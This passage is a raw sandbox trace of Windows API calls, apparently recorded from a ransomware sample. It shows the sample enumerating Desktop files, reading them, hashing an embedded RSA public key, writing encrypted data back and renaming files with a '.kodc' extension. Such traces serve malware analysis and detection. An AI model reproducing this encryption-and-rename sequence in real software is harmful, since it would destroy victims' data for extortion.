out: hHeap=0x630000) returned 1 [0097.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fcc0 | out: hHeap=0x630000) returned 1 [0097.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0097.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0097.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0097.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0097.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0097.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0097.579] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0xd6db, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0xd6db, lpOverlapped=0x0) returned 1 [0097.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0097.580] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xd6e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.580] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0097.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0097.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce208 [0097.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333a888 [0097.580] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333a888, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0097.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0097.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce208 | out: hHeap=0x630000) returned 1 [0097.580] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0097.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.580] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.580] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0097.581] CloseHandle (hObject=0x5cc) returned 1 [0097.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.598] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0097.598] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693400 | out: hHeap=0x630000) returned 1 [0097.598] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0UuOGgFHrUTR7ZhF.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0uuoggfhrutr7zhf.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\0UuOGgFHrUTR7ZhF.mkv.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\0uuoggfhrutr7zhf.mkv.kodc")) returned 1 [0097.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0097.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.599] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x693378 | out: hHeap=0x630000) returned 1 [0097.600] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73a5ca00, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0x743e6080, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0x71437000, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0xc0c00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="243E.TMP.EXE.DEL105265203.DEL105731312.exe", cAlternateFileName="243ETM~1.EXE")) returned 1 [0097.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0097.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3336ce0 [0097.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.600] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe") returned=".exe" [0097.600] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\243E.TMP.EXE.DEL105265203.DEL105731312.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\243e.tmp.exe.del105265203.del105731312.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0097.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3336ce0 | out: hHeap=0x630000) returned 1 [0097.600] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc45fd60, ftCreationTime.dwHighDateTime=0x1d5beda, ftLastAccessTime.dwLowDateTime=0xe3a7c9e0, ftLastAccessTime.dwHighDateTime=0x1d5b989, ftLastWriteTime.dwLowDateTime=0xe3a7c9e0, ftLastWriteTime.dwHighDateTime=0x1d5b989, nFileSizeHigh=0x0, nFileSizeLow=0x3799, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4jwDK-_ApAqP4UABdnk.pps", cAlternateFileName="4JWDK-~1.PPS")) returned 1 [0097.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0097.600] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0097.600] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0097.601] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4jwDK-_ApAqP4UABdnk.pps") returned=".pps" [0097.601] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4jwDK-_ApAqP4UABdnk.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4jwdk-_apaqp4uabdnk.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0097.601] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=14233) returned 1 [0097.601] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0097.604] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x3773, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.604] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0097.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.605] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.605] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x3799, lpOverlapped=0x0) returned 1 [0097.605] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0097.605] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.605] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.605] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693400) returned 1 [0097.606] CryptCreateHash (in: hProv=0x693400, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0097.606] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.606] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0097.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0097.606] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0097.606] GetLastError () returned 0x0 [0097.606] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0097.606] CryptReleaseContext (hProv=0x693400, dwFlags=0x0) returned 1 [0097.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0097.606] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0097.606] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0097.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.606] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0097.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0097.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0097.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x37a0) returned 0x9ba4d90 [0097.606] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0097.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0097.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fcc0 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a550 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fc78 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a598 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a490 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a610 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0097.607] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0097.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a490 | out: hHeap=0x630000) returned 1 [0097.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a610 | out: hHeap=0x630000) returned 1 [0097.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0097.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a610 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331a490 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c428 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c540 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0097.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0097.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0097.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a610 | out: hHeap=0x630000) returned 1 [0097.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0097.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a490 | out: hHeap=0x630000) returned 1 [0097.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0097.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0097.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0097.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0097.608] GetCurrentThreadId () returned 0x42c [0097.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0097.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x695be8 [0097.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0097.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693400 [0097.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0097.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0097.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0097.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.608] GetCurrentThreadId () returned 0x42c [0097.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0097.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0097.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0097.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0097.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0097.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0097.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0097.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0097.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0097.608] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.608] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0097.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0097.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0097.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0097.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0097.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0097.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a490 [0097.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0097.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0097.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0097.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0097.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0097.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a610 [0097.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0097.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0097.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0097.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5c8 [0097.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0097.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0097.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0097.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0097.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0097.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0097.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a628 [0097.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331a5b0 [0097.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0097.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec50 [0097.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0097.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0097.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0097.609] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0097.609] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a490 | out: hHeap=0x630000) returned 1 [0097.610] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a490 [0097.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0097.610] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0097.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0097.610] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c428 [0097.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a5b0 | out: hHeap=0x630000) returned 1 [0097.610] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32d0958 [0097.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0097.610] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c658 [0097.610] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0097.610] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c770 [0097.610] 